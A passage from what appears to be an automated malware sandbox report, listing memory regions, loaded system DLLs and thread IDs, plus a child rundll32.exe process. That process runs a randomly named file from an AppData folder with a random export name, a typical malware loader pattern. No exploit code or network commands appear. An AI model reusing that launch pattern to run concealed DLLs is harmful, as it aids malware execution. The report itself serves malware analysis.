"c:\\windows\\system32\\kernelbase.dll") Region: id = 1446 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1447 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1448 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1449 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1450 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1451 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1452 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1453 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1454 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1455 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1456 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1457 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1458 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1459 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1460 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1461 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1462 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1463 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1464 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1465 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1466 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1467 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1468 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1469 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1470 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1471 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 1472 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 1473 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 1474 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 1475 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 1476 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 1477 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1478 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1479 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 1480 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 1481 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1482 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1483 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1484 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1485 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1486 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1487 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1488 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1489 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1490 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1491 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1492 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1493 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1494 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1495 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1496 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1497 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1498 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1499 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1500 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1501 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1502 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1503 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1504 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1505 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1506 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1507 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1508 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1703 start_va = 0x7fef1900000 end_va = 0x7fef1ad3fff monitored = 0 entry_point = 0x7fef1936b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1704 start_va = 0x5ef0000 end_va = 0x60effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ef0000" filename = "" Region: id = 1705 start_va = 0x2d20000 end_va = 0x2e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 1706 start_va = 0x1f60000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1707 start_va = 0x60f0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060f0000" filename = "" Region: id = 1708 start_va = 0x930000 end_va = 0x930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1709 start_va = 0x940000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1710 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1711 start_va = 0x14e0000 end_va = 0x156ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 1712 start_va = 0x960000 end_va = 0x962fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1713 start_va = 0x12b0000 end_va = 0x12bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1714 start_va = 0x12c0000 end_va = 0x12cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1715 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1716 start_va = 0x12c0000 end_va = 0x12cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1717 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1718 start_va = 0x12c0000 end_va = 0x12cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1719 start_va = 0x970000 end_va = 0x97ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1720 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1721 start_va = 0x970000 end_va = 0x97ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1722 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1723 start_va = 0x23d0000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1724 start_va = 0x29b0000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 1725 start_va = 0x2d70000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 1726 start_va = 0x2e10000 end_va = 0x2e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1727 start_va = 0x2fb0000 end_va = 0x302ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 1728 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1729 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1730 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1731 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1734 start_va = 0x26e0000 end_va = 0x2789fff monitored = 0 entry_point = 0x26e4104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1736 start_va = 0x970000 end_va = 0x97cfff monitored = 0 entry_point = 0x97a138 region_type = mapped_file name = "wuauclt.exe" filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe") Region: id = 1741 start_va = 0x64f0000 end_va = 0x673efff monitored = 0 entry_point = 0x64f236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1742 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 1743 start_va = 0x3320000 end_va = 0x339ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 1744 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1745 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 1746 start_va = 0x980000 end_va = 0x98ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1747 start_va = 0x990000 end_va = 0x99ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1748 start_va = 0x9a0000 end_va = 0x9affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1840 start_va = 0x1ce0000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1841 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2144 start_va = 0x2f40000 end_va = 0x2fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 2171 start_va = 0x23c0000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 2182 start_va = 0x1fc0000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 2183 start_va = 0x26a0000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 2184 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Thread: id = 43 os_tid = 0xd34 Thread: id = 44 os_tid = 0xcac Thread: id = 45 os_tid = 0xb1c Thread: id = 46 os_tid = 0x560 Thread: id = 47 os_tid = 0x3c4 Thread: id = 48 os_tid = 0x484 Thread: id = 49 os_tid = 0x4fc Thread: id = 50 os_tid = 0x77c Thread: id = 51 os_tid = 0x3e8 Thread: id = 52 os_tid = 0x31c Thread: id = 53 os_tid = 0x228 Thread: id = 54 os_tid = 0x5b4 Thread: id = 55 os_tid = 0x410 Thread: id = 56 os_tid = 0x478 Thread: id = 57 os_tid = 0x444 Thread: id = 58 os_tid = 0x440 Thread: id = 59 os_tid = 0x76c Thread: id = 60 os_tid = 0x748 Thread: id = 61 os_tid = 0x730 Thread: id = 62 os_tid = 0x724 Thread: id = 63 os_tid = 0x6fc Thread: id = 64 os_tid = 0x6e8 Thread: id = 65 os_tid = 0x6e0 Thread: id = 66 os_tid = 0x6c0 Thread: id = 67 os_tid = 0x6ac Thread: id = 68 os_tid = 0x694 Thread: id = 69 os_tid = 0x4b0 Thread: id = 70 os_tid = 0x4ac Thread: id = 71 os_tid = 0x49c Thread: id = 72 os_tid = 0x498 Thread: id = 73 os_tid = 0x48c Thread: id = 74 os_tid = 0x1bc Thread: id = 75 os_tid = 0x120 Thread: id = 76 os_tid = 0x3f0 Thread: id = 77 os_tid = 0x3e4 Thread: id = 78 os_tid = 0x3d8 Thread: id = 79 os_tid = 0x37c Thread: id = 80 os_tid = 0x378 Thread: id = 81 os_tid = 0x36c Thread: id = 82 os_tid = 0x364 Thread: id = 84 os_tid = 0xdb4 Thread: id = 85 os_tid = 0xdb8 Thread: id = 86 os_tid = 0xdbc Thread: id = 87 os_tid = 0xdc0 Thread: id = 92 os_tid = 0xe04 Thread: id = 93 os_tid = 0xe08 Thread: id = 94 os_tid = 0xe0c Thread: id = 95 os_tid = 0xe10 Thread: id = 96 os_tid = 0xe1c Thread: id = 98 os_tid = 0xe30 Thread: id = 101 os_tid = 0xe40 Thread: id = 136 os_tid = 0xecc Thread: id = 139 os_tid = 0xef4 Thread: id = 142 os_tid = 0xf08 Thread: id = 145 os_tid = 0xf54 Thread: id = 146 os_tid = 0xf58 Thread: id = 152 os_tid = 0xf90 Thread: id = 153 os_tid = 0xf94 Thread: id = 156 os_tid = 0xfb0 Thread: id = 162 os_tid = 0xac8 Process: id = "5" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x17b9000" os_pid = "0xddc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xd98" cmd_line = "C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",QxrXksBkO" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1612 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1613 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1614 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1615 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1616 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1617 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1618 start_va = 0xf0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1619 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1620 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1621 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1622 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1623 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1624 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1625 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1626 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1627 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1628 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1633 start_va = 0x70000 end_va = 0x71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1634 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1635 start_va = 0x200000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1636 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1637 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1638 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1639 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1640 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1641 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" 